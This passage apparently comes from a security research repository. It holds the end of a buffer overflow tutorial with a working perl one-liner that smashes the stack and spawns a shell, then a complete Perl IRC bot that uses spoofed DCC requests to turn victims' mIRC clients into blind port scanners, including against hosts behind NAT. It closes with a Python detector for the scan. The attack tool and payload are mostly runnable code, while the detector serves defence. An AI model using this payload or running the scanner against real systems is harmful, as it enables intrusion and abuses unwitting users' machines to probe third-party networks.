
Note that EDX points at the start of the string, so the bytes of "MANPATH=" execute first. They happen
to decode (in 32-bit mode) to harmless single-byte instructions (dec, inc, push) followed by a
cmp eax,imm32 whose immediate swallows four of the NOPs, which is one reason the sled is there.

We can now exploit the application with the return address found previously: 124 bytes of filler to
cover the 100-byte buffer, compiler padding and the saved frame pointer, then 0x08048338 written in
little-endian byte order.

prdelka@gentoo ~ $ uname -a
Linux gentoo 2.6.12-gentoo-r10 #2 Tue Sep 13 00:33:15 IDT 2005 i686 Mobile Intel(R) Celeron(R) CPU 1.70GHz GenuineIntel GNU/Linux
prdelka@gentoo ~ $ ./bug `perl -e 'print "\x90"x124;print "\x38\x83\x04\x08";'`
sh-3.00$

-------------------------------------------------------------------------------- /apple_A6_decap.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackerhouse-opensource/documents/f8f0945a0e2106fb1fefead88d7bc0deaadc694b/apple_A6_decap.zip -------------------------------------------------------------------------------- /learn_morse.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackerhouse-opensource/documents/f8f0945a0e2106fb1fefead88d7bc0deaadc694b/learn_morse.pdf -------------------------------------------------------------------------------- /tcp_blind_scanning_via_mIRC.txt: --------------------------------------------------------------------------------
#!/usr/bin/perl
# (IRC)DCC connect() blind port
# scanner
# =====================================
# This IRC bot implements a method to blind port
# scan a host using DCC. It works specifically
# against win32 IRC clients, namely mIRC. The
# attack relies on the fact that mIRC uses sequential
# port numbers when establishing DCC connections,
# incrementing only on a successful connect. An
# example of the implementation is shown below.
#
#            _           _
#           | |   DCC   | |
#       mIRC|_|<------->|_|Attacker
#        Src:1026
#
# 1. First we send a DCC request to the mIRC user.
#    A listener on the attacker's system learns the
#    source port of the connecting DCC.
#
#            _
#           | | 194.217.240.73
#           |_| Destination port 2913
#           /
#         _/             _
#        | |            | |
#    mIRC|_|<-----------|_|Attacker
#     Src:1027
#
# 2. Then we send a spoofed DCC request (appearing
#    to come from the Destination we intend to scan)
#    to the mIRC client.
#
#            _           _
#           | |   DCC   | |
#       mIRC|_|<------->|_|Attacker
#        Src:1027
#
# 3. After waiting a short while for the mIRC client
#    to either connect or time out the connection to
#    the destination, we send another DCC request which
#    connects to our listener. In our example, mIRC
#    has not incremented its source port since phase 1
#    of the attack completed, so we know the port is closed.
#
# It is worth noting at this point that the ideal
# candidate is a mIRC client with autoget/autochat
# enabled that isn't actively DCCing. DCC/port timeouts
# can provide false positives. The following behavioural
# traits of Microsoft systems were noticed, which
# could affect the results of this scan.
#
# WinXP SP2(eng) has 1025 listening by default.
# Win2003 Enterprise(eng) has 1025 & 1026 listening by default.
# Win2000 Adv. server(eng) has 1025,1026,1027,1028,1031,1036
# 1037,1038,1039 listening by default.
55 | # Win2000 Professional has 1025 listening by default. 56 | # 57 | # This attack was tested extensively against a WinXP SP2(eng) 58 | # mIRC client with Autoget/Autochat enabled and file ignore 59 | # switched off. It obtained accurate scanning results. 60 | # This technique can also be used to scan behind NAT. 61 | # 62 | # To use this bot, the following command is used 63 | # from an IRC channel. 64 | # 65 | # !scan 192.168.0.1 65535 mircuser 1 66 | # Dest IP Port Nick 1/2(CHAT/SEND) 67 | # 68 | # Example. 69 | # < ATTACKER> !scan 192.168.0.1 22 mircsux 2 70 | # < mIRCDCCx> [ (IRC)DCC connect() blind port scanner 71 | # < mIRCDCCx> [ checking 192.168.0.1 (22/TCP) from mircsux using SEND 72 | # < mIRCDCCx> [ port is open (LST:1024 SRC:1027 RST:3) 73 | # < mIRCDCCx> [ done. 74 | # 75 | # This was not set out to be the best implementation 76 | # of the attack. Just a conceptual tool that such an 77 | # attack vector exists. 78 | # 79 | # - prdelka 80 | use IO::Socket; 81 | 82 | ################# 83 | # Configuration # 84 | ################# 85 | 86 | my $ircserver = "irc.YOURIRCD.net"; 87 | my $nickname = "mIRCDCCx"; 88 | my $admin_channel = "#DCC-SCANNER"; 89 | my $listener_ip = '123.123.123.123'; 90 | my $listner_port = 10000; 91 | my $dcc_timeout = 40; 92 | 93 | ############################## 94 | #!!#DO NOT EDIT BELOW HERE#!!# 95 | ############################## 96 | print "[ (IRC)DCC connect() blind port scanner robot running\n"; 97 | if($pid = fork()) #parent returns PID (parent is the IRC bot) (child is a listener for DCC accepts) 98 | { 99 | ############################# 100 | # connect to the IRC server # 101 | # and join admin channel # 102 | ############################# 103 | 104 | $sock = IO::Socket::INET->new( 105 | PeerAddr => $ircserver, 106 | PeerPort => 6667, 107 | Proto => 'tcp' ) or die "could not make the connection"; 108 | 109 | while($line = <$sock>){ 110 | if($line =~ /(NOTICE AUTH).*(checking ident)/i){ 111 | print $sock "NICK 
$nickname\nUSER username 0 0 :email\@address\n"; 112 | last; 113 | } 114 | } 115 | while($line = <$sock>){ 116 | if($line =~ /^PING/){ 117 | print $sock "PONG :" . (split(/ :/, $line))[1]; 118 | } 119 | if($line =~ /(376|422)/i){ 120 | #print $sock "NICKSERV :identify nick_password\n"; 121 | last; 122 | } 123 | } 124 | sleep 3; 125 | print $sock "JOIN $admin_channel nopnop\n"; 126 | 127 | ################### 128 | # START main loop # 129 | ################### 130 | 131 | while ($line = <$sock>) { 132 | #$text is the stuff from the ping or the text from the server 133 | ($command, $text) = split(/ :/, $line); 134 | 135 | ################ 136 | # PING handler # 137 | ################ 138 | 139 | if ($command eq 'PING'){ 140 | while ( (index($text,"\r") >= 0) || (index($text,"\n") >= 0) ){ chop($text); } 141 | print $sock "PONG $text\n"; 142 | next; 143 | } 144 | 145 | ################# 146 | # Main BOT code # 147 | ################# 148 | 149 | 150 | ($nick,$type,$channel) = split(/ /, $line); #split by spaces 151 | 152 | ($nick,$hostname) = split(/!/, $nick); #split by ! to get nick and hostname seperate 153 | 154 | $nick =~ s/://; #remove :'s 155 | #$text =~ s/://; 156 | 157 | #get rid of all line breaks. Again, many different way of doing this. 
158 | $/ = "\r\n"; 159 | while($text =~ m#$/$#){ chomp($text); } 160 | 161 | 162 | ############### 163 | # CHANNEL CMD # 164 | ############### 165 | 166 | if($channel eq $admin_channel){ 167 | 168 | if($text =~ /!scan/){ 169 | ($trigger,$destination,$port,$nickname,$type) = split / /,$text; 170 | ($da,$db,$dc,$dd) = split /\./,$listener_ip; 171 | $decdest = sprintf("%2.2x%2.2x%2.2x%2.2x",$da,$db,$dc,$dd); 172 | $decdest = hex($decdest); 173 | ($scana,$scanb,$scanc,$scand) = split /\./,$destination; 174 | $scandest = sprintf("%2.2x%2.2x%2.2x%2.2x",$scana,$scanb,$scanc,$scand); 175 | $scandest = hex($scandest); 176 | sleep 2; 177 | print $sock "PRIVMSG $admin_channel :[ (IRC)DCC connect() blind port scanner\n"; 178 | if($type==1) 179 | { 180 | print $sock "PRIVMSG $admin_channel :[ checking $destination ($port/TCP) from $nickname using CHAT\n"; 181 | print $sock "PRIVMSG $nickname :\x01DCC CHAT CHAT $decdest $listner_port\x01\n"; 182 | sleep 5; 183 | print $sock "PRIVMSG $nickname :\x01DCC CHAT CHAT $scandest $port\x01\n"; 184 | sleep $dcc_timeout; # timeout ^ check 1 port 185 | print $sock "PRIVMSG $nickname :\x01DCC CHAT CHAT $decdest $listner_port\x01\n"; 186 | } 187 | if($type==2) 188 | { 189 | $file = rand(time()); 190 | print $sock "PRIVMSG $admin_channel :[ checking $destination ($port/TCP) from $nickname using SEND\n"; 191 | print $sock "PRIVMSG $nickname :\x01DCC SEND $file $decdest $listner_port 1864\x01\n"; 192 | sleep 5; 193 | $file = rand(time()); 194 | print $sock "PRIVMSG $nickname :\x01DCC SEND $file $scandest $port 1864\x01\n"; 195 | sleep $dcc_timeout; # timeout ^ check 1 port 196 | $file = rand(time()); 197 | print $sock "PRIVMSG $nickname :\x01DCC SEND $file $decdest $listner_port 1876\x01\n"; 198 | } 199 | sleep 3; 200 | open(OUT, "< tmp.txt"); 201 | while() 202 | { 203 | print $sock "PRIVMSG $admin_channel :$_"; 204 | sleep 1; 205 | } 206 | close(OUT); 207 | print $sock "PRIVMSG $admin_channel :[ done.\n"; 208 | open(OUT, "> tmp.txt"); 209 | 
print OUT ""; 210 | close(OUT); 211 | } 212 | 213 | } 214 | 215 | } 216 | } 217 | 218 | ################## 219 | # CHILD LISTENER # 220 | ################## 221 | if($pid==0)#The child listner loop, setting port number connects. 222 | { 223 | $serv = new IO::Socket::INET (LocalAddr => $listner_ip, 224 | LocalPort => $listner_port, 225 | Proto => 'tcp', 226 | Listen => 5); 227 | while(1){ 228 | $new_sock = $serv->accept(); 229 | $peerport = $new_sock->peerport(); 230 | close($new_sock); 231 | $baseport = $peerport; 232 | $new_sock = $serv->accept(); 233 | $peerport = $new_sock->peerport(); 234 | $result = $peerport - $baseport; 235 | open(OUT, "> tmp.txt"); 236 | if($baseport == 1024) ## WinXP(SP2)en. cavaet(src port 1025 unused!) 237 | { 238 | if($result == 2) 239 | { 240 | print OUT "[ port is closed (LST:$baseport SRC:$peerport RST:$result)\n"; 241 | } 242 | if($result == 3) 243 | { 244 | print OUT "[ port is open (LST:$baseport SRC:$peerport RST:$result)\n"; 245 | } 246 | } 247 | if($baseport != 1024) 248 | { 249 | if($result == 1) 250 | { 251 | print OUT "[ port is closed (LST:$baseport SRC:$peerport RST:$result)\n"; 252 | } 253 | if($result == 2) 254 | { 255 | print OUT "[ port is open (LST:$baseport SRC:$peerport RST:$result)\n"; 256 | } 257 | } 258 | close(OUT); 259 | close($new_sock); 260 | } 261 | } 262 | --------------------------------------------------------------------------------
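Added here as a detection-side illustration, not part of the original script or the Hacker House repository: a parser for the two DCC CTCP shapes the bot above emits, which decodes the 32-bit decimal address back to a dotted quad and flags the two signatures of the scan described in its header, an advertised DCC address that is not the sender's own (step 2) and the listener/target/listener request cadence (steps 1-3). The log lines, nicks and addresses are constructed, and the hostmask is assumed to carry the sender's real IP.

```python
import re
from ipaddress import IPv4Address

# Constructed server-side log lines (":nick!user@host PRIVMSG target :<CTCP>")
# in the two request shapes the bot emits; the host field is assumed to hold
# the sender's real IP, as many ircds record it.
SAMPLE_LINES = [
    ":mIRCDCCx!bot@123.123.123.123 PRIVMSG mircsux :\x01DCC SEND 0.123 2071690107 10000 1864\x01",
    ":mIRCDCCx!bot@123.123.123.123 PRIVMSG mircsux :\x01DCC SEND 0.456 3232235521 22 1864\x01",
    ":mIRCDCCx!bot@123.123.123.123 PRIVMSG mircsux :\x01DCC SEND 0.789 2071690107 10000 1876\x01",
    ":alice!alice@10.0.0.5 PRIVMSG bob :\x01DCC CHAT CHAT 167772165 5000\x01",
]

# DCC CHAT CHAT <ip> <port>   |   DCC SEND <file> <ip> <port> <size>
DCC_RE = re.compile(
    r"^:(?P<nick>[^!]+)![^@]+@(?P<host>\S+) PRIVMSG (?P<target>\S+) "
    r":\x01DCC (?P<kind>CHAT|SEND) \S+ (?P<ip>\d+) (?P<port>\d+)(?: \d+)?\x01$"
)

def parse_dcc(line):
    """Return the DCC request fields, with the decimal address turned back
    into a dotted quad (the inverse of the bot's sprintf/hex encoding)."""
    m = DCC_RE.match(line.rstrip("\r\n"))
    if not m:
        return None
    d = m.groupdict()
    d["ip"] = str(IPv4Address(int(d["ip"])))
    d["port"] = int(d["port"])
    return d

def spoofed(req):
    """Step 2 marker: the advertised DCC address is not the sender's own."""
    return req["ip"] != req["host"]

def scan_sequences(reqs):
    """Steps 1-3 marker: one sender whose consecutive requests go
    listener -> some other address:port -> the same listener again.
    Returns (nick, probed (ip, port)) for each match."""
    by_nick = {}
    for r in reqs:
        by_nick.setdefault(r["nick"], []).append((r["ip"], r["port"]))
    hits = []
    for nick, seq in by_nick.items():
        for a, b, c in zip(seq, seq[1:], seq[2:]):
            if a == c and b != a:
                hits.append((nick, b))
    return hits

if __name__ == "__main__":
    reqs = [r for r in map(parse_dcc, SAMPLE_LINES) if r]
    print([r["nick"] for r in reqs if spoofed(r)])  # ['mIRCDCCx']
    print(scan_sequences(reqs))                      # [('mIRCDCCx', ('192.168.0.1', 22))]
```

A DCC whose advertised address is private (192.168.0.1 here) while the sender is on a public address is a further cheap check on the same parsed fields.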